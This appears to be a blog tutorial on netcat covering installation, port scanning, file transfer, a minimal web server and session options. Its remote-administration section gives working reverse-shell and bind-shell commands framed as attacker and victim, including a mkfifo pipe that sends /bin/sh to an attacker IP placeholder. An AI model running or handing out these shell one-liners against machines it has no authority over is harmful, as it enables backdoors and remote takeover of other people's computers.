Netcat Swiss Army Knife Pro Usage

Netcat – Swiss Army Knife Pro Usage
Netcat is a utility which is used for reading and writing data across TCP and UDP ports. It can be used for a lot of cool stuff like file transfer, port scanning, port redirecting, backdooring someone else’s PC, making a simple chat program, for network troubleshooting and more, that’s why it’s known as swiss army knife. Also it comes pre-installed with almost every Linux distribution nowadays and it is mainly used by Network Administrators, DevOps and Security Engineers for their daily small tasks.

A brief difference between netcat-traditional and netcat-openbsd

There are two similar packages available for netcat with a slight difference between them.

netcat-traditional includes an additional ‘-e’ option which can be used for binding a program (i.e bash) with netcat. This feature is very useful for remote administration purposes.

netcat-openbsd have some additional support for IPv6 and proxies.

Netcat Installation

Though netcat comes pre-installed in most Linux distributions but if its not, it can be installed easily using the following commands.

For traditional package,

ubuntu@ubuntu:~$ sudo apt-get install netcat-traditional

For openbsd version,

ubuntu@ubuntu:~$ sudo apt-get install netcat-openbsd

Netcat for Windows can be downloaded from here https://sourceforge.net/projects/nc110/files/.

Now we’ll explore some interesting use cases of netcat

Port Scanning using netcat

To scan for open ports, use ‘-z’ option. Netcat will try to connect to every port without sending any data or very limited data in UDP case. Type the following

ubuntu@ubuntu:~$ nc -z -v hackme.org 80
…snip…
hackme.org [217.78.1.155] 80 (http) open

To scan for a range of ports, type

ubuntu@ubuntu:~$ nc -z -nv 192.168.100.72 2080
(UNKNOWN) [192.168.100.72] 80 (http) open
(UNKNOWN) [192.168.100.72] 22 (ssh) open

File Transfer with netcat

Another useful use case of netcat is file transfer between remote computers. You can send texts and binary files from one PC to another PC. We’ll try to send a file “file.pdf” from Linux PC to Windows PC [IP 192.168.100.72] using netcat as an example.

On Windows machine (receiver), type the following

C:Users> nc -nvlp 1337 > file.pdf
Listening on [0.0.0.0] (family 2, port 1337)

On Linux machine (sender), type the following

ubuntu@ubuntu:~$ nc -nv 192.168.100.72 1337 < file.pdf
Connection to 192.168.100.72 1337 port [tcp/*] succeeded!

Remote Administration with netcat

One of the best use cases of netcat is remote administration, that means you can control someone else’s PC using netcat. Netcat-traditional comes with ‘-e’ option which can be used to bind a program (i.e cmd.exe in Windows or bash in Linux) with a port, that means netcat will act as communicator between the program and the remote PC. Netcat will receive commands from remote PC, execute on local system and will send the results back to the remote PC. This feature is widely used for malicious purposes, to keep backdoors in PCs and servers. This feature is only available in netcat-traditional but with a little trick, netcat-openbsd can also be used for the same purpose. You can use two ways to control others’ PC.

In a Reverse Shell connection,  an attacker listens on a port and waits for a connection to be sent from the victim machine. It is used when victim computer is behind NAT or doesn’t have public IP.

To get a reverse shell using netcat, you need to listen on a port using netcat. Type the following on the attacker machine,

ubuntu@ubuntu:~$ nc -nvlp 1337
Listening on [0.0.0.0] (family 2, port 1337)

On victim machine (if netcat-traditional is installed)

//replace “/bin/bash” with “cmd.exe” in case of Windows

ubuntu@ubuntu:~$ nc -nv [IP_ADDR] 1337 -e /bin/bash

For netcat-openbsd (where “-e” option isn’t supported)

ubuntu@ubuntu:~$ rm /tmp/f;mkfifo /tmp/f;cat
/tmp/f|/bin/sh -i 2>&1|nc [IP_ADDR] 1337 >/tmp/f

While in a Bind Shell connection, attacker binds a port on the victim machine and connects to that port using client socket. It is used when attacker’s machine is behind NAT or doesn’t have a public IP.

On victim machine, type

ubuntu@ubuntu:~$ nc -nlvp 1337 -e /bin/bash
listening on [any] 1337

Now, to run commands on the victim machine, type

ubuntu@ubuntu:~$ nc -nv 127.0.0.1 1337
Connection to 127.0.0.1 1337 port [tcp/*] succeeded!
$ id
uid=1000(azad) gid=1000(azad) groups=1000(azad),4(adm),24(cdrom),27(sudo),
30(dip),46(plugdev),118(lpadmin),129(sambashare)

Simple Web Server using netcat

You can also do another simple trick to use netcat as minimal single page web server. This web server would be very simple with no special configurations, and we’ll use to it send our HTML code to the browser.

ubuntu@ubuntu:~$ while true ; do  echo -e "HTTP/1.1 200 OKnn $(echo "<h1>
My Simple Webserver using netcat</h1>")" | nc -nvlp 1337  ; done
Listening on [0.0.0.0] (family 2, port 1337)

Now, try to fetch the webpage using curl

ubuntu@ubuntu:~$ curl http://127.0.0.1:1337/
<h1>My Simple Webserver using netcat</h1>

Specify Timeout for a netcat Session

You can specify timeout for a netcat session using “-w” option. Netcat will automatically disconnect its session after the specified time passes out.

// -w [Time in Seconds]
ubuntu@ubuntu:~$ nc -w 40 -nvlp 1337
Listening on [0.0.0.0] (family 2, port 1234)

Continue Listening even if Client closes the Connection

In normal mode, netcat server shuts down and stop listening on the port when a client closes the connection. You can keep the server up using “-k” option

ubuntu@ubuntu:~$ nc -k -nlvp 1234
Listening on [0.0.0.0] (family 2, port 1234)

Conclusion

Netcat is simple yet efficient utility which can be used for a lot of simple daily tasks. It comes pre-installed in almost every UNIX like operating systems and can be used for various tasks like communication between two PCs, file transfer and many more.

Related Posts
Leave a Reply

Your email address will not be published.Required fields are marked *